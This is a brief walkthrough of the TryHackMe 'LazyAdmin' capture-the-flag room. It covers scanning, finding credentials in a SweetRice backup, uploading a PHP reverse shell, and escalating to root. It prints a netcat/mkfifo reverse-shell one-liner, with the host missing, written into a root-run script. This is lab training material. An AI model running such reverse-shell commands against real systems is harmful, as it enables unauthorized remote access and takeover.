TryHackMe | LazyAdmin
Run nmap
Apache server on port 80. Walk the website.
Nothing in the usual spaces -robots.txt, etc.
Run directory scanning
Let’s check out content.
“SweetRice” shows up. Subdomains show login page
Another subdomain show directory listing
My_sql-bakup looks interesting
Download and view. I noticed some possible credentials.
Turns out this is a MD5 hash. We have a password.
Let’s log in.
We may possibly be able to upload a reverse shell. The Ads section looks promising. Copy/paste php reverse shell from Pentestmonkey.
Set up listener
Activate shell
Have a reverse shell. Upgrade the shell and search for elevated privileges.
Edit the file use this code to create a listener for a bind shell:
echo “**rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 1234 >/tmp/f” > /etc/**
I have to redo my shell. We can run the new backup file and get a root shell
Search for flags